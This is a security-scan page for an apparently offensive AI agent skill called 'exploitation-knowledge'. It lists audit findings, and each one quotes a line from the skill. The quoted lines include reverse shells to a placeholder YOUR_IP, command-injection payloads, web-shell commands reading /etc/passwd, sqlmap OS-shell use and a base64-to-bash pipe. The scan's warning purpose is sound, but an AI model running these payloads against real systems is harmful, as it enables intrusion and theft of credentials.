Skip to main content

exploitation-knowledge

Provides comprehensive methodologies for vulnerability exploitation, including exploit discovery, adaptation, and initial access techniques.

Install this skill

or
0/100

Security score

The exploitation-knowledge skill was audited on Feb 9, 2026 and we found 40 security issues across 4 threat categories, including 5 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

high line 160

Direct command execution function call

SourceSKILL.md
160python3 -c 'import pty;pty.spawn("/bin/bash")'
high line 299

Piping content to bash shell

SourceSKILL.md
299- Base64: echo BASE64 | base64 -d | bash
medium line 119

System command execution

SourceSKILL.md
119<?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>
medium line 116

Python subprocess execution

SourceSKILL.md
116python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call
medium line 63

Curl to non-GitHub URL

SourceSKILL.md
63curl -s "https://api.github.com/search/repositories?q=CVE-YYYY-XXXXX+exploit" | jq -r '.items[].html_url'
medium line 172

Curl to non-GitHub URL

SourceSKILL.md
172curl -F "[email protected]" http://TARGET/upload.php
medium line 181

Curl to non-GitHub URL

SourceSKILL.md
181curl http://TARGET/uploads/shell.php?cmd=id
medium line 201

Curl to non-GitHub URL

SourceSKILL.md
201curl "http://TARGET/ping.php?ip=127.0.0.1;id"
medium line 202

Curl to non-GitHub URL

SourceSKILL.md
202curl "http://TARGET/ping.php?ip=127.0.0.1|whoami"
medium line 203

Curl to non-GitHub URL

SourceSKILL.md
203curl "http://TARGET/ping.php?ip=127.0.0.1`whoami`"
medium line 206

Curl to non-GitHub URL

SourceSKILL.md
206curl "http://TARGET/ping.php?ip=;bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
medium line 216

Curl to non-GitHub URL

SourceSKILL.md
216curl -s "https://api.github.com/search/repositories?q=CVE-2021-XXXX" | jq -r '.items[].html_url'
medium line 310

Curl to non-GitHub URL

SourceSKILL.md
310curl "http://TARGET/shell.php?cmd=which nc"
medium line 314

Curl to non-GitHub URL

SourceSKILL.md
314curl "http://TARGET/shell.php?cmd=which python3"
medium line 318

Curl to non-GitHub URL

SourceSKILL.md
318curl "http://TARGET/shell.php?cmd=python3 -c 'import socket,subprocess...'"
medium line 377

Curl to non-GitHub URL

SourceSKILL.md
377curl http://TARGET/shell.php?cmd=cat+/etc/passwd
medium line 380

Curl to non-GitHub URL

SourceSKILL.md
380curl http://TARGET/shell.php?cmd=cd+/home;ls+-la
medium line 383

Curl to non-GitHub URL

SourceSKILL.md
383curl http://TARGET/shell.php?cmd=id;whoami;pwd
medium line 219

Wget to non-GitHub URL

SourceSKILL.md
219wget https://raw.githubusercontent.com/user/repo/exploit.py
high line 194

Access to /etc/passwd

SourceSKILL.md
194sqlmap -u "http://TARGET/page.php?id=1" --file-read=/etc/passwd
high line 276

Access to /etc/passwd

SourceSKILL.md
276# Try: cat /etc/passwd
high line 377

Access to /etc/passwd

SourceSKILL.md
377curl http://TARGET/shell.php?cmd=cat+/etc/passwd
low line 63

External URL reference

SourceSKILL.md
63curl -s "https://api.github.com/search/repositories?q=CVE-YYYY-XXXXX+exploit" | jq -r '.items[].html_url'
low line 172

External URL reference

SourceSKILL.md
172curl -F "[email protected]" http://TARGET/upload.php
low line 178

External URL reference

SourceSKILL.md
178gobuster dir -u http://TARGET/uploads -x php,phtml
low line 181

External URL reference

SourceSKILL.md
181curl http://TARGET/uploads/shell.php?cmd=id
low line 188

External URL reference

SourceSKILL.md
188sqlmap -u "http://TARGET/page.php?id=1" --batch --level=5 --risk=3
low line 191

External URL reference

SourceSKILL.md
191sqlmap -u "http://TARGET/page.php?id=1" --os-shell
low line 194

External URL reference

SourceSKILL.md
194sqlmap -u "http://TARGET/page.php?id=1" --file-read=/etc/passwd
low line 201

External URL reference

SourceSKILL.md
201curl "http://TARGET/ping.php?ip=127.0.0.1;id"
low line 202

External URL reference

SourceSKILL.md
202curl "http://TARGET/ping.php?ip=127.0.0.1|whoami"
low line 203

External URL reference

SourceSKILL.md
203curl "http://TARGET/ping.php?ip=127.0.0.1`whoami`"
low line 206

External URL reference

SourceSKILL.md
206curl "http://TARGET/ping.php?ip=;bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
low line 216

External URL reference

SourceSKILL.md
216curl -s "https://api.github.com/search/repositories?q=CVE-2021-XXXX" | jq -r '.items[].html_url'
low line 310

External URL reference

SourceSKILL.md
310curl "http://TARGET/shell.php?cmd=which nc"
low line 314

External URL reference

SourceSKILL.md
314curl "http://TARGET/shell.php?cmd=which python3"
low line 318

External URL reference

SourceSKILL.md
318curl "http://TARGET/shell.php?cmd=python3 -c 'import socket,subprocess...'"
low line 377

External URL reference

SourceSKILL.md
377curl http://TARGET/shell.php?cmd=cat+/etc/passwd
low line 380

External URL reference

SourceSKILL.md
380curl http://TARGET/shell.php?cmd=cd+/home;ls+-la
low line 383

External URL reference

SourceSKILL.md
383curl http://TARGET/shell.php?cmd=id;whoami;pwd
Scanned on Feb 9, 2026
View Security Dashboard
Installation guide →